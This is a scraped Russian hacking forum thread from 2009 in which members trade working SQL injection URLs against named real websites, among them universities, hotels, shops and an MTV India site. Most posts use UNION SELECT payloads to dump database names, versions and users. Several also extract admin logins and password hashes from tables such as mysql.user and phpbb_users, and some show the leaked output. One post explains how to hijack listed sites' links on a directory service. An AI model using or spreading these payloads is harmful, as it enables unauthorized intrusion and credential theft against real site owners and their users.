SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. mol0t

    mol0t Member

    Joined:
    8 Jul 2009
    Messages:
    28
    Likes Received:
    89
    Reputations:
    3
    Code:
    http://www.ruig-gian.org/news/news.php?ID=-40+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8,9,10,11--
    
    ruig-gianorg3:5.0.45-log:ruigadmin@localhost


    Code:
    http://www.smash-uk.com/frf09/news.php?id=-40+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6--
    
    fujirock:5.0.67-userstats-log:[email protected]


    Code:
    http://diamondring.gimalai.org/new.php?id=-22+union+select+1,2,3,concat_ws(0x3a,database(),version(),user()),5,6,7--
    
    diamondring:5.0.54-log:diamondring@localhost


    Code:
    http://www.mapawproject.com/news.php?ID=-5+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4,5,6,7,8--
    
    mapaw:5.0.27:[email protected]

    Code:
    http://www.crazyhoroscopes.com/display-news.php?id=-5+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4--
    
    arif:5.0.51a-24+lenny1:arif@localhost
     
  2. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    HTML:
    http://www.germanfirms.ru/products.php?id=-6+union+select+concat_ws(0x3a,version(),database(),user())--
    4.1.22-standard-log:db156426_4:db156426_4@local2

    HTML:
    http://www.naturalaquario.com/products.php?id=-6+union+select+1,concat_ws(0x3a,version(),database(),user())--
    5.0.81-community:natuocom_naturalaqua:natuocom_ang@localhost

    HTML:
    http://www.freshmushroomfarm.org/products.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),database(),user())--
    5.0.81-community-log:freshmus_fmf:freshmus_fmfweb@localhost

    HTML:
    http://ostrova.onego.ru/hotel.php?id=-4+union+select+concat_ws(0x3a,version(),database(),user())--
    5.0.37:eek:strovadb:eek:[email protected]

    HTML:
    http://www.kerkira.ru/Hotels/hotel.php?ID=4&i=0&ID_Region=-4+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7--
    4.1.22-log:wwwkerkiraru:[email protected]

    HTML:
    http://www.sanpancrazioviaggi.it/front/de/hotel.php?id=-999+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8/*
    5.0.37-community-nt:sanpancrazio:viaggisan@localhost

    HTML:
    http://www.exploringcostarica.com/ing/hotel.php?id=4+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9--
    4.1.22-standard-log:explorin_bdexplorin:explorin_usExplo@localhost

    HTML:
    http://hi-tekmexico.com/spanish/hotel.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
    4.1.25-Debian_mt1-log:db9596_secture

    HTML:
    http://www.viajandoparaorlando.com/forum/hoteis/hotel.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11--
    5.0.67.d7-ourdelta-log:viajando_:[email protected]
     
  3. Snap

    Snap Elder - Старейшина

    Joined:
    5 Feb 2007
    Messages:
    61
    Likes Received:
    33
    Reputations:
    -4
    ООО «МАКстрой»

    Детские автокресла Kiddy

     
    #10123 Snap, 17 Jul 2009
    Last edited: 17 Jul 2009
  4. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.domaine-la-fourmone.com/bouteille2_gb.php?id=-15+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17
    Code:
    [email protected]:my116691:5.0.32-Debian_7etch8-log
     
  5. aciiiD

    aciiiD Member

    Joined:
    25 Jan 2009
    Messages:
    12
    Likes Received:
    11
    Reputations:
    -8
    Code:
    http://www2.mtvindia.com/news/news.php?id=-153+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,password,user),9+from+mysql.user--
    Сайт индийского MTV :)
    Code:
    http://62.105.76.90:81/benefex/whats_new/market_news/news.php?id=-1+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10+from+information_schema.tables--
    Code:
    http://www.fujibikes.com.br/2009/news.php?id=153%20and%20substring(version(),1,1)=5
    pr:4
    tuc:0
    version:5.x.x.x
    Code:
    http://www.meat-trade.com/prg/news.php?id=-1+union+select+1,group_concat(table_name),3,4+from+information_schema.tables--
    Code:
    http://www.fiercekitten.com/blog/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),passw d),6,7+from+neener_members--
    Code:
    http://www.lygus.lt/ITC/news.php?id=-1+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables--
    
    Code:
    http://qaf.mskiteonline.com/news.php?id=153%20and%20substring(version(),1,1)=4
    Code:
    http://sibselmash.nsk.ru/news.php?id=-1%20union%20select%201,2,3,concat_ws(0x3a,log,psw),5,6,7+from+psw--
    Code:
    http://www.wicable.tv/news_and_resources/news.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.tables+limit+30,1--
     
    #10125 aciiiD, 17 Jul 2009
    Last edited: 17 Jul 2009
    3 people like this.
  6. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 6]
    Code:
    http://www.gmm.gu.se/groups/pedersen/popDetail.php?ID=-8+union+select+1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14--
    5.0.45:dbldbase:dbl@localhost
    Code:
    http://www.gmm.gu.se/groups/pedersen/popDetail.php?ID=-8+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,password,file_priv),8,9,10,11,12,13,14+from+mysql.user--
    ===============================
    [PR 6]
    Code:
    http://www.coandco.cc/mutat.php?id=9999999999+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35
    5.0.81:coandco:coandco@localhost
    ===============================
    [PR 4]
    Code:
    http://uz.cafspeech.kz/site.php?id=4&lan=english&newsid=-126+union+select+concat_ws(0x3a,version(),database(),user())
    5.0.41-community-nt:uz_cafspeech:cafspeech@localhost
    ===============================
    [PR 3]
    Code:
    http://www.mgce.uz.ua/post.php?id=-277+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6
    5.0.45-log:mgce_d2:[email protected]
    ===============================
    [PR 3]
    Code:
    http://www.gslc.cc/displaycms.php?id=-58+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5
    5.0.67-custom-log:goodshepherdcms:[email protected]
    ===============================
    [PR 1]
    Code:
    http://www.nationaltravel.com.py/v1/detalle.del.paquete.php?id=-16+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10
    5.0.67-community:national_national:national_natio@localhost
     
    1 person likes this.
  7. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    Code:
    http://www.snap.co.uk/shop/nav.php?&dff_catnum=-193+union+select+1,concat_ws(0x3a3a,user(),database(),version()),3,4,5+--+
    Code:
    http://www.geekroom.co.uk/ablog/index.php?cat=-1+union+select+1,version()+--+
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.revell.ro/store/index.php?action=ViewGroups&grp=-401+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*



    Database Version: 4.1.22-standard
    Database name: revell_store
    User name: revell_store@localhost
    OS: pc-linux-gnu
     
    1 person likes this.
  9. mol0t

    mol0t Member

    Joined:
    8 Jul 2009
    Messages:
    28
    Likes Received:
    89
    Reputations:
    3
    Code:
    http://www.crazyhoroscopes.com/display-news.php?id=-5+union+select+1,2,concat_ws(0x3a,database(),version(),user()),4--
    
    arif:5.0.51a-24+lenny1:arif@localhost


    Code:
    http://alink-design.com/news.php?id=-2+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6--
    
    alinkdesign:5.0.67.d7-ourdelta-log:[email protected]


    Code:
    http://wired.st-and.ac.uk/~wong/agent/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),version(),user())--
    
    wong:5.0.32-Debian_7etch10-log:[email protected]

    Code:
    http://www.myhopeyouth.com/news.php?id=-1+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5--
    
    myhope_site:4.1.22-standard:myhope_admin@localhost


    Code:
    http://autosklad35.ru/news/news.php?id=-4+union+select+1,2,3,concat_ws(0x3a,database(),version(),user()),5--
    
    asklad_sklad:5.0.81-community:asklad_sklad@localhost


    Code:
    http://www.idijabar.or.id/news.php?aksi=detail&id=-1+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8--
    
    idijabar_ididb:5.0.67-community:idijabar_aatea@localhost
     
    1 person likes this.
  10. Calcutta

    Calcutta Elder - Старейшина

    Joined:
    6 Aug 2007
    Messages:
    343
    Likes Received:
    243
    Reputations:
    36
    http://www.verav.ru/common/mpublic.php?num=12311+union+select+1,2,3,4,group_concat(0x3a,username,0x3a,admin,0x3a,kwort),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1+from+user
     
    #10130 Calcutta, 18 Jul 2009
    Last edited: 18 Jul 2009
  11. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    пр3 ТиЦ 30
    Code:
     
    http://www.vs.com.ua/a-news/news.php?id=-25+union+select+1,2,3,concat(login,0x3a,password),5,6,7,8,9,0+from+aadm_users--
    
    PR: 3 ТиЦ: 20
    Code:
      
    http://www.iks.com.ua/rus/aktualno/novyny/news.php?id=-25+union+select+1,2,3,4,concat(username,0x3a,user_password),6,7,8,9,0,1+from+phpbb_users--
    
     
  12. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://dinero.tv/mostrar.nota.php?id=-1+union+select+1,concat_ws(0x3a,database(),user(),version()),3,4,5,6--
     
    _________________________
  13. aciiiD

    aciiiD Member

    Joined:
    25 Jan 2009
    Messages:
    12
    Likes Received:
    11
    Reputations:
    -8
    Code:
    http://cmup.fc.up.pt/cmup/v2/view/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,password,nome),6,7+from+users--
    _http://www.tippsupportersclub.com/news.php?id=-1+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x6a756e696f7273--
     
    #10133 aciiiD, 18 Jul 2009
    Last edited by a moderator: 19 Jul 2009
    2 people like this.
  14. mr.gr33n

    mr.gr33n Banned

    Joined:
    6 Jul 2009
    Messages:
    47
    Likes Received:
    68
    Reputations:
    6
    PR:1 тИц:10
    Code:
    http://www.neolitica.ru/article.php?id=-8+union+select+1,version(),database(),concat(login,0x3a,pass),5,user(),7,8,9+from+bgblog.user--
    
     
    #10134 mr.gr33n, 19 Jul 2009
    Last edited by a moderator: 19 Jul 2009
  15. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.vashiokna.com.ua/calc.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version())/*
    Code:
    u_vashiokna@localhost:vashiokna:4.1.22-log
     
    1 person likes this.
  16. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    946
    Likes Received:
    838
    Reputations:
    605
    http://couleurcantal.tv/chaines.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--&limit=6

    root@localhost:fal:5.0.32-Debian_7etch5-log

    tables: admin,partenaires,chaines,tags,comment,videos,newsletter,pages

    login:pass
    Code:
    http://couleurcantal.tv/chaines.php?id=-1+union+select+1,group_concat(concat_Ws(0x3a,login,pass)),3,4,5,6+from+admin--&limit=6

    eCTb MYSQL.user

    http://couleurcantal.tv/chaines.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,user,password,file_priv)),3,4,5,6+from+mysql.user--&limit=6


    ####################################

    http://www.nashe.tv/forum/viewmsg.php?msg_id=-725+union+select+1,2,3,concat_Ws(0x3a,user(),database(),version()),5,6,7,8--

    u_nashe@localhost:nashe:4.1.22-log
     
    _________________________
    #10136 HAXTA4OK, 19 Jul 2009
    Last edited: 19 Jul 2009
    1 person likes this.
  17. beerhack

    beerhack Elder - Старейшина

    Joined:
    1 Mar 2008
    Messages:
    99
    Likes Received:
    48
    Reputations:
    5
    PR 4
    Code:
    http://nemo.mwd.hartford[COLOR=Yellow].edu[/COLOR]/mwd08/news.php?id=-13+union+select+1,2,version(),4--
    Database Version: 5.0.45-log
    Database name: websitedata
    User name: iitsite@localhost
     
  18. rolex

    rolex Member

    Joined:
    7 Apr 2009
    Messages:
    27
    Likes Received:
    35
    Reputations:
    4
    PR 4
    PR 4
    PR 3, ТИЦ 30
    PR 2
    PR 2
     
    1 person likes this.
  19. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Code:
    WAPLOG.EU/outtop.php?uid=-238+union+select+concat_ws(0x3a,uid,site_name,link,pass)+from+users+limit+30,1--
    и т.д.
    ЗЫ: Можно заменить линк любоко сайта на свой
    Узнать можно так
    Code:
    WAPLOG.EU/outtop.php?uid=-238+union+select+concat_ws(0x3a,site_name,link,pass,email)+from+users+where+uid=254--
    Где UID номер зарегистрированного сайта
     
    #10139 SeNaP, 19 Jul 2009
    Last edited: 19 Jul 2009
  20. mol0t

    mol0t Member

    Joined:
    8 Jul 2009
    Messages:
    28
    Likes Received:
    89
    Reputations:
    3
    Code:
    http://www.factway.net/en/news.php?id=-9+union+select+1,concat_ws(0x3a,database(),version(),user()),3,4,5,6,7,8,9--
    
    factway_factway:5.0.81-community:factway_factway@localhost


    Code:
    http://www.oekoeffizienz.at/news.php?id=-9+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,database(),version(),user()),10,11,12--
    
    oekoeffizienz:5.0.32-Debian_7etch10-log:eek:eko@localhost


    Code:
    http://www.spcf.edu.ph/nextpage/news.php?t=1&id=-38+union+select+1,2,3,4,5,6,concat_ws(0x3a,database(),version(),user()),8,9,10--
    
    spcfedup_spcfdbf:5.0.81-community:spcfedup@localhost
     
Thread Status:
Not open for further replies.